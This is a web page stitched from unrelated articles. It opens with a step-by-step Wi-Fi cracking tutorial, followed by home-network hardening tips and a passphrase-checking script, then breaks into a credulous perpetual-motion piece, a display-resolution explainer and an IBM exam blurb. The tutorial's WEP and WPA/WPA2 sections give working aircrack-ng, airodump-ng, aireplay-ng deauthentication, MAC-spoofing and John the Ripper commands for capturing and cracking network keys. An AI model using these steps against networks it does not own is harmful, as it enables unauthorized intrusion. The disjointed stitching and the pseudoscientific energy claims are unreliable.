How to Hack Wifi (and how to avoid being hacked): WEP/WPA/WPA2

This guide is meant to show how easy it is to hack wireless networks if the proper security measures are not in place. First I will show how to hack a WEP or WPA/WPA2 Network and then I will give tips on how to avoid getting hacked.

This is important information in our tech-savvy culture. If your wireless network is compromised you can be held liable for any illegal activity on it. There are numerous stories of child pornographers and black-hat hackers using other people's wireless networks.

NOTE: Hacking your neighbors or anyone else’s Wifi without their permission is ILLEGAL. Be smart!


Step 1 : What you Need

-A Computer. (A Laptop works best)
-A Wireless Card capable of packet injection.
-If your laptop wireless card can’t do packet injection you can purchase a wireless adapter such as the Netgear WG111 v2 for around $8-$12 on eBay.

-A Live installation of BackTrack either on a CD or USB stick.
-BackTrack 5 Can be found Here
-Create a Live USB Install Here


Step 2 : Hack WEP

WEP is the predecessor of WPA and has been broken for the past 5+ years, yet people continue to use it. With the instructions below we can crack WEP in under 15 minutes. You can crack WEP from the command line, but there is an easy GUI interface in BackTrack which makes it a much less painful experience for those who are scared of command prompts.

1. Boot into BackTrack

2. Click on the Backtrack applications menu -> Backtrack -> Exploitation tools -> Wireless exploitation -> WLAN Exploitation -> gerix-wifi-cracker-ng (This will open up the GUI interface seen in the picture).

3. Go to the configuration menu and select the wireless interface wlan0
-Click on Enable/Disable Monitor Mode (this will put the wireless card into monitor mode).
-Select the newly created mon0 interface.

4. Now click on the WEP tab at the top of the window.
-Click on “Start sniffing and logging” and leave the terminal open.
-Once the wireless network you want to crack* shows up (it has to use WEP encryption, of course), select "WEP Attacks (with clients)". *Note that the PWR (signal strength) has to be high enough to work, so the closer you can get, the better.
-There you click on “Associate with AP using fake auth”, wait a few seconds and click on “ARP request replay”.

5. Once the Data count reaches 10,000 you are ready to try to crack the key (if the data is coming in fast, wait until 20,000 or 30,000 to be safe), but don't close any windows yet.
-Go to the cracking tab and click on “Aircrack-ng – Decrypt WEP password” under Wep Cracking.

It will take a few seconds to minutes to crack the password and then you are good to go.


Step 3 : Hack WPA/WPA2

At least WPA and WPA2 are safe, right? Wrong. WPA and WPA2 are both crackable, but the time it takes to crack depends on the strength of the password.
-Boot into BackTrack
-Open up Konsole which is a command line utility built into BackTrack. It is the Black Box in the Lower-Left Hand Corner (See Image).
We will now be entering the following commands into the command line (each command is shown on its own line below), along with explanations of what they do:

-The following commands stop the wireless interface so you can change your MAC address. This is important because your MAC address is a unique identifier, so faking one is a good idea if you are accessing a network you don't have permission to (which, by the way, I wholly condemn).

1:
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0

2:
-Now we will run airodump-ng on the monitor-mode interface mon0 (created by the airmon-ng start command above); this lists all of the wireless networks around us (see the first picture).

airodump-ng mon0

Now choose the network you want to hack and take note of its BSSID, the channel it is on, and its ESSID. The PWR has to be fairly high to be able to hack it; this is determined by how close you are to the wireless router. The closer you are, the better.

Once you have chosen the wireless network, enter the following into the terminal. It writes the captured packets to files named "filename"; we are trying to capture the handshake between the router and a wireless client, which is what we need in order to crack the key.

3:
airodump-ng mon0 --channel * --bssid **:**:**:**:**:** -w filename

The following step is optional but is highly recommended as it will speed up the process a great deal.

Once “WPA handshake: **:**:**:**:**:**” appears in the top right-hand corner we can move on. If you are having trouble getting the WPA handshake to occur then do step 4.

4:
aireplay-ng -0 1 -a **:**:**:**:**:** -c **:**:**:**:**:** mon0

What step 4 does is deauthenticate a connected client so that it reconnects, which generates a new handshake to capture. You are done with this step once you have captured the handshake.

5:
aircrack-ng -w wordlist.lst -b **:**:**:**:**:** filename.cap

Step 5 now tries to crack the password in "filename.cap" using a list of words, here called "wordlist.lst". You can download a good 200 million word dictionary here (128MB zipped, 800MB unzipped).

Your computer has to compute the hash value of every password in that list, but a computer can go through those 200 million passwords in 6-12 hours.

6:

If the password isn't found in the dictionary you can try to brute-force the password with this command (note that this could take a very long time depending on the password strength):

/pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b **:**:**:**:**:** -w - filename.cap



Step 4 : Secure Your Own Wireless Network

Hopefully you have gained some insight into how to keep your own wireless network from being hacked:

1. Use WPA2 (WPA2-AES) if available, and by all means never use WEP.
2. Don't base your password on a dictionary word. The next section focuses on passwords in general.
3. In your router settings you can usually hide your ESSID (the name of the wireless network); this adds a small layer of security.
4. Your router probably has a MAC-address filtering feature where you can specify the MAC addresses that are allowed to connect. This makes sure that only your approved devices can connect to your network (obviously a problem, though, if you have a guest over who wants to connect to your Wifi).
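As an added illustration of points 1 and 2 (example code written for this page, not from the guide), the check below rejects a WPA2 passphrase that appears in a cracking wordlist, even after the usual case/trailing-digit/leet mangling, and estimates worst-case exhaustive-search time at the guide's own figure of 200 million candidates in 6-12 hours. The wordlist and the candidate passphrases are constructed samples.

```python
"""Passphrase check for a WPA2-PSK network (added example, not the guide's code).

The guide's point: a passphrase in a wordlist falls in hours, while anything
else costs the attacker time that grows with length and character variety.
"""
import string

# Constructed sample wordlist; it stands in for the 200-million-word list the
# guide refers to (a real check would stream that file line by line).
SAMPLE_WORDLIST = {"password", "letmein", "sunshine", "dragon", "football"}

# Guide's figure: 200 million candidates in 6-12 hours. Use the fast end (6 h,
# about 9,300 candidates/s) so the estimate errs on the defender's side.
CANDIDATES_PER_SECOND = 200_000_000 / (6 * 3600)

MIN_LEN, MAX_LEN = 8, 63  # WPA/WPA2 ASCII passphrase length limits
_LEET = str.maketrans("01345$@7", "oieassat")  # undo common substitutions


def dictionary_forms(pw: str) -> set:
    """Variants a wordlist rule set would try: lowercase, leet undone,
    trailing digits dropped, and the combinations of those."""
    base = pw.lower()
    forms = {base, base.translate(_LEET)}
    forms |= {f.rstrip(string.digits) for f in list(forms)}
    return forms


def charset_size(pw: str) -> int:
    """Size of the alphabet an attacker must enumerate for this passphrase."""
    classes = [string.ascii_lowercase, string.ascii_uppercase,
               string.digits, string.punctuation]
    return sum(len(c) for c in classes if any(ch in c for ch in pw))


def brute_force_years(pw: str) -> float:
    """Worst-case exhaustive-search time at CANDIDATES_PER_SECOND, in years."""
    seconds = charset_size(pw) ** len(pw) / CANDIDATES_PER_SECOND
    return seconds / (365 * 24 * 3600)


def check_passphrase(pw: str, wordlist: set = SAMPLE_WORDLIST) -> dict:
    """Return {'ok': bool, 'reasons': [...], 'years': float}."""
    reasons = []
    if not MIN_LEN <= len(pw) <= MAX_LEN:
        reasons.append(f"length must be {MIN_LEN}-{MAX_LEN} characters")
    if dictionary_forms(pw) & wordlist:
        reasons.append("matches a wordlist entry after simple mangling")
    years = brute_force_years(pw)
    if years < 1:
        reasons.append(f"exhaustive search takes under a year ({years:.2f})")
    return {"ok": not reasons, "reasons": reasons, "years": years}
```

The rate constant is the guide's single-CPU figure; GPU crackers are far faster, so treat the year estimate as a lower bound on what is needed, not a guarantee.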

World’s First Perpetual Motion Machine?

Since at least the 12th century, man has sought to create a perpetual motion machine: a device that would continue working indefinitely without any external source of energy.

A large scientific contingent thinks such a device would violate the laws of thermodynamics, and is thus impossible.

Could it be that as a race, we don’t fully understand the laws of physics and such a device may indeed be possible? What would the ramifications be if we could actually build a perpetually moving device?


Norwegian artist and mathematician Reidar Finsrud is an outside-the-box thinker who has devised a machine that he believes achieves true perpetual motion. Take a look at the video below and see what you think.




The dream is that if we're able to produce perpetual motion machines, we'd have tapped into the holy grail of sustainability: an infinite energy source.

A device that requires no input to run and could be affixed to a generator would harvest free energy to power whatever we so pleased. This is obviously a dangerous and controversial idea due to the amount of money being made by energy companies around the world.

What are your thoughts? Do you think Finsrud has created true perpetual motion?

Graphic Display Resolutions – What Do The Numbers, SD - HD Ready - Full HD, 720p versus 1080p - 1080i Mean?

Graphic Display resolutions can be a rather cryptic business, with multiple standards used to describe the same display resolution in 10 different ways. All of those technical terms tend to change based on the display’s purpose (television versus computer monitor) and even your region (the meaning of HD Ready).

Previously, we talked about 7 Important Things To Know When Buying an LCD Monitor, the difference between full HD and HD Ready and even how Apple’s retina display works. Today, we’ll help you make sense of the different terms people tend to throw around when describing display resolutions. When buying a computer monitor or a TV screen, it can be incredibly useful to know what those numbers mean. Not just to differentiate between two displays, but also to determine what kind of display you should be looking for.

Width x Height

The easiest convention is the one that's used to describe the maximum resolution of computer monitors. A lot of laptop displays have a maximum resolution of 1280×800, and the resolution of larger computer screens often goes into the neighborhood of 1680×1050.

These numbers describe the width and height of the display in pixels – the building blocks of your display. Some displays have different pixel densities (most famously, Apple’s retina displays), meaning the physical size of two displays with the same maximum graphic display resolution is not necessarily uniform. But the actual resolution (that is, the amount of available building blocks to construct a picture) is unambiguous.


SD, HD Ready Or Full HD

The difference between SD and anything with ‘HD’ in its name is simple. SD – or Standard Definition – is usually used to indicate television displays that are not 720p or 1080p High Definition screens, or 480p Enhanced Definition screens. More generally, the term SD display is used to indicate 576i displays in the PAL and SECAM regions, or 480i displays in the NTSC region.

Full HD is used to describe 1080p displays. The difference between HD Ready and Full HD is more ambiguous, and depends on the region. For more information, read Matt’s article on The Difference Between HD Ready and Full HD.

If some of the words used above made little sense, don’t worry. We’ll explain the meaning of 720p and 1080p in a bit, as well as the difference between 1080p and 1080i (progressive versus interlaced) displays.


720p versus 1080p or 1080i

Modern televisions are often described using terms like 720p and 1080p, or 1080i. The number at the front of the term indicates the lines of vertical resolution. Thus, 720p and 1080p have 720 and 1080 lines respectively of vertical resolution. Both 1080p and 1080i screens have 1080 lines of vertical resolution (we’ll explain the difference between these two below).

To compare the resolution of these displays to the width x height notation of computer displays, we can glean the lines of horizontal resolution from the aspect ratio. For example, a 1080p display with a conventional 16:9 aspect ratio has 1920 lines of horizontal resolution, meaning a 16:9 1080p screen has a resolution of 1920 x 1080 pixels.


1080p versus 1080i, or Progressive versus Interlaced

The difference between 1080p and 1080i, or rather the difference between progressive and interlaced displays comes down to how the image is displayed.

Progressive displays use frames. One frame is one completely rendered image. If you press pause while watching a video, you’re looking at a single frame. If a progressive display is said to have 25 frames per second, that means it renders 25 distinct images every second.

Interlaced displays work very differently. Instead of refreshing the entire picture, they refresh half the lines in the picture. It's meaningless to talk about frames per second, because an interlaced display never displays a 'complete frame'. Instead, we express the refresh rate in fields per second, where one field contains half the lines of the display.

In an ideal, theoretical world, progressive would always be better than interlaced. However, there are a few problems with that thought. Progressive displays don't have the same refresh rate as interlaced displays. Although an interlaced display only renders half the lines of the display with each refresh, it refreshes twice as often as the equivalent progressive display, and each of these fields is part of a distinct snapshot. On top of that comes the fact that television broadcasting uses interlaced video.

All this makes interlaced pictures more fluid in motion than the equivalent deinterlaced pictures. On the other hand, progressive pictures are more easily scaled, paused and edited, which makes the image more adaptable with less loss of quality.

What other specs do you look at when shopping for displays? Let us know.

IBM Certification Exam 000-001 the First Step in Applying Maximo Enterprise Asset Management Solutions


The IBM 000-001 certification exam is the first step in testing your knowledge of the fundamentals of Applying Maximo Enterprise Asset Management Solutions V2 in a client's environment. The exam tells IBM how well you will be able to identify opportunities and influence key personnel.

The test, which is associated with the IBM Certified Solution Advisor certification, lasts 60 minutes and has around 43 questions. A passing score is 65. There are six sections on the IBM 000-001 exam. Thorough preparation is essential; you should find a quality, online testing prep service like TestsLive.com that offers practice exam procedures.

Here are the six sections and a brief summary of what they each entail.

Section 1: Current Architecture and Environment: In this section, you will be asked to fully comprehend a customer's technical environment by analyzing its architecture, including networking hardware, software and security.

Section 2: Business Drivers: You must have a thorough grasp of the theories of Enterprise Asset Management to pass this section.

Section 3: Functional Requirements: You will be asked to identify key areas of the customer's business methods that relate to Enterprise Asset Management.

Section 4: Reporting Requirements: This section tests your knowledge of EAM reporting options.

Section 5: Integration and Interfacing Requirements: Migration and Integration strategies are tested, specifically how to move the client to the proposed IBM EAM solution.

Section 6: Customization: Your knowledge of tailoring tools will be tested here, as well as your ability to explain it to the client.